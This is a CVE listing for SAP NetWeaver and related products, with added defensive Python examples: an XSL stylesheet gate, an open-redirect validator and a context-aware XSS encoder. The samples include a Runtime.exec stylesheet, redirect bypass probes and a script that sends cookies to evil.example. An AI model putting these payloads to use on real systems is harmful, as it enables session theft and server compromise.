
CVE-2021-21489
https://notcve.org/view.php?id=CVE-2021-21489
14 Sep 2021 — SAP NetWeaver Enterprise Portal versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50 do not sufficiently encode user-related data, resulting in a Stored Cross-Site Scripting (XSS) vulnerability. This allows an attacker with administrative privileges to store a malicious script on the portal. Execution of the script by a victim registered on the portal could compromise the confidentiality and integrity of portal content. • https://launchpad.support.sap.com/#/notes/3082219 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2021-37531 – SAP Enterprise Portal XSLT Injection
https://notcve.org/view.php?id=CVE-2021-37531
14 Sep 2021 — SAP NetWeaver Knowledge Management XML Forms versions 7.10, 7.11, 7.30, 7.31, 7.40 and 7.50 contain an XSLT vulnerability that allows a non-administrative authenticated attacker to craft a malicious XSL stylesheet file containing a script with OS-level commands, copy it to a location accessible to the system, and then create a file that triggers the XSLT engine to execute the script contained in the malicious XSL file. This can result in a full compromise of the confidentiality, integrity, a... • http://packetstormsecurity.com/files/165751/SAP-Enterprise-Portal-XSLT-Injection.html • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
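The attack path described for CVE-2021-37531 is an attacker-supplied XSL stylesheet that the server's XSLT engine executes. What turns a stylesheet into OS command execution is the processor's extension-function mechanism (Xalan/XSLTC's Java binding, MSXML's msxsl:script, EXSLT dyn and similar); the engine-side fix is to disable those extensions, and a defence-in-depth control is to refuse such stylesheets before they reach the engine. The following gate is an added example, not SAP's code and not the SAP Note's fix: it parses an uploaded stylesheet and rejects any extension namespace or inline-script element it finds. The namespace list, the sample stylesheets and the `rt:exec` payload shape are constructed for this example; the page does not give the exact payload used against KM XML Forms.

```python
"""Added example (not SAP's code): reject XSL stylesheets that declare
extension-function namespaces or inline script elements before an XSLT
engine ever compiles them. Sample stylesheets below are constructed."""
import xml.etree.ElementTree as ET
from io import BytesIO

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Namespace URIs (matched by prefix) that expose extension functions or scripts.
# This list is an assumption for the example; extend it for the processor in use.
BLOCKED_NS_PREFIXES = (
    "http://xml.apache.org/xalan/java",   # Xalan / JDK XSLTC Java binding (java.lang.Runtime, ...)
    "http://xml.apache.org/xslt/java",    # older Xalan Java extension URI
    "http://saxon.sf.net/java-type",      # Saxon reflexive extension functions
    "urn:schemas-microsoft-com:xslt",     # msxsl:script
    "http://exslt.org/dynamic",           # dyn:evaluate
    "http://www.jclark.com/xt/java",      # XT java: URI
)
BLOCKED_ELEMENTS = {
    ("urn:schemas-microsoft-com:xslt", "script"),
    (XSL_NS, "script"),                   # XSLT 1.1 draft element, implemented by some engines
}


def find_stylesheet_risks(xsl_bytes: bytes) -> list[str]:
    """Return findings for the stylesheet; an empty list means it passed the gate."""
    findings = []
    try:
        # "start-ns" events surface every xmlns declaration, including ones on
        # nested elements; "start" events let us check element names.
        for event, payload in ET.iterparse(BytesIO(xsl_bytes), events=("start-ns", "start")):
            if event == "start-ns":
                prefix, uri = payload
                if any(uri.startswith(bad) for bad in BLOCKED_NS_PREFIXES):
                    findings.append(f"extension namespace xmlns:{prefix or '(default)'}={uri!r}")
            elif payload.tag.startswith("{"):
                ns, local = payload.tag[1:].split("}", 1)
                if (ns, local) in BLOCKED_ELEMENTS:
                    findings.append(f"script element <{local}> in namespace {ns}")
    except ET.ParseError as exc:
        # Malformed input is rejected too; never hand it to the engine "to see".
        findings.append(f"unparseable stylesheet: {exc}")
    return findings


def is_safe_stylesheet(xsl_bytes: bytes) -> bool:
    return not find_stylesheet_risks(xsl_bytes)


# Constructed sample: the classic Xalan/XSLTC Java-binding shape for running a command.
MALICIOUS_XSL = b"""<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
  <xsl:template match="/">
    <xsl:value-of select="rt:exec(rt:getRuntime(), 'id')"/>
  </xsl:template>
</xsl:stylesheet>
"""

# Constructed sample: MSXML inline script (two findings: namespace and element).
MSXSL_XSL = (b'<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"'
             b' xmlns:msxsl="urn:schemas-microsoft-com:xslt">'
             b'<msxsl:script language="JScript" implements-prefix="u">function f(){}</msxsl:script>'
             b'</xsl:stylesheet>')

# Constructed sample: an ordinary form-rendering stylesheet that should pass.
BENIGN_XSL = b"""<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/form">
    <html><body><h1><xsl:value-of select="title"/></h1></body></html>
  </xsl:template>
</xsl:stylesheet>
"""

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_XSL), ("msxsl", MSXSL_XSL), ("benign", BENIGN_XSL)):
        print(name, find_stylesheet_risks(doc) or "OK")
```

This gate is a complement to, not a replacement for, the engine's own hardening (for a JAXP transformer, setting `XMLConstants.FEATURE_SECURE_PROCESSING` disables extension functions); a stylesheet that merely passes this scan still runs with whatever the engine permits.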

CVE-2021-38150
https://notcve.org/view.php?id=CVE-2021-38150
14 Sep 2021 — When an attacker manages to gain access to the local memory or a memory dump of a victim, for example through a social engineering attack, SAP Business Client versions 7.0 and 7.70 allow them to read extremely sensitive data such as credentials. This would allow the attacker to compromise the corresponding backend for which the credentials are valid. • https://launchpad.support.sap.com/#/notes/3060621 • CWE-312: Cleartext Storage of Sensitive Information •

CVE-2021-33706
https://notcve.org/view.php?id=CVE-2021-33706
10 Aug 2021 — Due to improper input validation in InfraBox, logs can be modified by an authenticated user. • https://github.com/SAP/InfraBox/security/advisories/GHSA-gw7h-9xvm-83qh • CWE-20: Improper Input Validation •

CVE-2021-33702 – SAP Enterprise Portal NavigationReporter Cross Site Scripting
https://notcve.org/view.php?id=CVE-2021-33702
10 Aug 2021 — Under certain conditions, NetWeaver Enterprise Portal versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50 do not sufficiently encode report data. An attacker can craft malicious data and print it to the report. In a successful attack, a victim opens the report and the malicious script executes in the victim's browser, resulting in a Stored Cross-Site Scripting (XSS) vulnerability. • http://packetstormsecurity.com/files/165737/SAP-Enterprise-Portal-NavigationReporter-Cross-Site-Scripting.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2021-33703 – SAP Enterprise Portal RunContentCreation Cross Site Scripting
https://notcve.org/view.php?id=CVE-2021-33703
10 Aug 2021 — Under certain conditions, NetWeaver Enterprise Portal versions 7.30, 7.31, 7.40 and 7.50 do not sufficiently encode URL parameters. An attacker can craft a malicious link and send it to a victim. A successful attack results in a Reflected Cross-Site Scripting (XSS) vulnerability. • http://packetstormsecurity.com/files/165740/SAP-Enterprise-Portal-RunContentCreation-Cross-Site-Scripting.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2021-33707 – SAP Enterprise Portal Open Redirect
https://notcve.org/view.php?id=CVE-2021-33707
10 Aug 2021 — SAP NetWeaver Knowledge Management allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component. This could enable the attacker to compromise the user's confidentiality and integrity. • http://packetstormsecurity.com/files/165748/SAP-Enterprise-Portal-Open-Redirect.html • CWE-601: URL Redirection to Untrusted Site ('Open Redirect') •
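CVE-2021-33707 is an open redirect through a URL stored in a component: the server issues a redirect to whatever was stored, so a stored `https://evil.example` becomes a phishing hop off a trusted host. The fix is to validate the target at the point of redirect, not just at the point of storage. The check below is an added example, not SAP's code or the packetstorm advisory's: it permits only same-origin absolute paths or https URLs to an allow-listed host and rejects the usual bypass shapes (scheme-relative `//host`, backslash-as-slash, userinfo `@` tricks, `javascript:` and control characters). The allow-listed host name, the `/irj/portal` default landing page and the sample targets are assumptions made for the example.

```python
"""Added example (not SAP's code): validate a stored or user-supplied redirect
target before issuing a 302 to it. Hosts and defaults are constructed."""
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"portal.example.internal"}   # assumed allow-list for this example


def safe_redirect_target(target: str, default: str = "/irj/portal") -> str:
    """Return `target` if it stays on an allowed origin, otherwise `default`."""
    if not target or any(ord(c) < 0x20 or c == "\x7f" for c in target):
        return default                       # CR/LF etc.: header-splitting bait, never redirect
    # Browsers treat a backslash like a forward slash in URLs; normalise first so
    # "/\evil.example" is parsed the way the browser will parse it.
    candidate = target.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute URL or scheme-relative "//host": https only, host must be
        # allow-listed, and no userinfo (parts.hostname would otherwise hide
        # "allowed.host@evil.example" or "user@allowed.host").
        if parts.scheme != "https" or "@" in parts.netloc or parts.hostname not in ALLOWED_HOSTS:
            return default
        return urlunsplit(parts)
    # Relative reference: require an absolute path on this origin.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


# Constructed cases a practitioner would try against a redirect endpoint.
PROBES = [
    "/irj/go?x=1#top",                                   # good: same-origin path
    "https://portal.example.internal/irj/x?y=1",         # good: allow-listed host
    "//evil.example/",                                   # scheme-relative
    "/\\evil.example/",                                  # backslash trick
    "https://evil.example/",                             # foreign host
    "https://attacker@portal.example.internal/",         # userinfo on allowed host
    "https://portal.example.internal@evil.example/",     # allowed host as userinfo
    "http://portal.example.internal/",                   # downgrade to http
    "javascript:alert(1)",                               # non-http scheme
    "/x\r\nLocation: https://evil.example",              # header injection
]

if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe!r:55} -> {safe_redirect_target(probe)!r}")
```

`urlsplit` does most of the parsing work, but note the two things it will not do for you: it does not normalise backslashes (the replace above handles that), and `parts.hostname` silently discards any userinfo, which is why the explicit `@` check on `netloc` comes first.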

CVE-2021-33699
https://notcve.org/view.php?id=CVE-2021-33699
10 Aug 2021 — Task Hijacking is a vulnerability that affects applications running on Android devices due to a misconfiguration of the task-control attributes in their AndroidManifest.xml. This allows an unauthorized attacker or malware to take over legitimate apps and steal the user's sensitive information. • https://github.com/naroSEC/CVE-2021-33699_Task_Hijacking •

CVE-2015-7731
https://notcve.org/view.php?id=CVE-2015-7731
09 Aug 2021 — SAP Mobile Platform 3.0 SP05 ClientHub allows attackers to obtain the keystream and other sensitive information via the DataVault, aka SAP Security Note 2094830. • https://seclists.org/bugtraq/2015/Aug/39 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •

CVE-2021-33682
https://notcve.org/view.php?id=CVE-2021-33682
14 Jul 2021 — SAP Lumira Server version 2.4 does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability. This allows an attacker with basic-level privileges to store a malicious script on SAP Lumira Server. Execution of the script by a victim registered on SAP Lumira Server could compromise the confidentiality and integrity of SAP Lumira content. • https://launchpad.support.sap.com/#/notes/3053403 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
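Four entries on this page (CVE-2021-21489, CVE-2021-33702, CVE-2021-33703 and CVE-2021-33682) share the same root cause wording: the application "does not sufficiently encode" something before writing it into a page, whether user-related data, report data or a URL parameter. "Sufficiently" is the operative word; HTML-escaping is the right encoding for element text, but a value that lands inside an `href` or a `<script>` string needs different treatment. The following is an added example, not code from SAP or from any of the advisories: `render_unsafe()` interpolates raw values the way the advisories describe, and `render_safe()` encodes each value for the context it is inserted into. The report rows, the payloads and the `/irj/...` paths are constructed for the example.

```python
"""Added example (not SAP's code): context-aware output encoding for data that
ends up in a generated page, beside the raw interpolation that causes stored and
reflected XSS. Report data, payloads and paths are constructed."""
import html
import json

# Constructed payloads: one stored in a report field, one reflected from a URL parameter.
MALICIOUS_NAME = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
MALICIOUS_PARAM = '"><img src=x onerror=alert(document.domain)>'

# Constructed report: the second row carries the stored payload in its "user" field.
REPORT = [{"user": "alice", "page": "/irj/portal/home"},
          {"user": MALICIOUS_NAME, "page": "/irj/portal/reports"}]


def render_unsafe(report_rows, back_url):
    """Raw interpolation into three contexts: element text, href attribute, JS string."""
    rows = "".join(f"<tr><td>{r['user']}</td><td>{r['page']}</td></tr>" for r in report_rows)
    return (f"<table>{rows}</table>"
            f'<a href="{back_url}">back</a>'
            f'<script>var back = "{back_url}";</script>')


def encode_for_js_string(value: str) -> str:
    """Encode for the inside of a JS string literal in an inline <script>.

    json.dumps handles quotes, backslashes and (with ensure_ascii) U+2028/2029;
    <, > and & are escaped as well so the literal can never close the script
    element or introduce markup if the page is later parsed as HTML."""
    return (json.dumps(value)[1:-1]
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def safe_href(value: str) -> str:
    """Attribute-encode a link target, after restricting it to a safe scheme.

    Encoding alone does not stop a javascript: URL, so scheme policy comes first:
    a same-origin absolute path or an https URL; anything else falls back to "/"."""
    lowered = value.strip().lower()
    same_origin_path = lowered.startswith("/") and not lowered.startswith("//")
    if not (same_origin_path or lowered.startswith("https://")):
        value = "/"
    return html.escape(value, quote=True)


def render_safe(report_rows, back_url):
    """Same page as render_unsafe, with each value encoded for its context."""
    rows = "".join(
        f"<tr><td>{html.escape(str(r['user']))}</td><td>{html.escape(str(r['page']))}</td></tr>"
        for r in report_rows)
    return (f"<table>{rows}</table>"
            f'<a href="{safe_href(back_url)}">back</a>'
            f'<script>var back = "{encode_for_js_string(back_url)}";</script>')


def contains_live_markup(rendered: str) -> bool:
    """Crude detector for the two payloads above surviving as real markup."""
    return "<script>document.location" in rendered or "<img src=x onerror" in rendered


if __name__ == "__main__":
    print("unsafe:", contains_live_markup(render_unsafe(REPORT, MALICIOUS_PARAM)))
    print("safe:  ", contains_live_markup(render_safe(REPORT, MALICIOUS_PARAM)))
    print(render_safe(REPORT, MALICIOUS_PARAM))
```

The point of the three contexts is that `html.escape` is correct for the table cells and, with `quote=True`, for the attribute value, but it would be wrong for the `<script>` string: a quote there needs a backslash escape, not `&quot;`, which is why the JS context gets its own encoder.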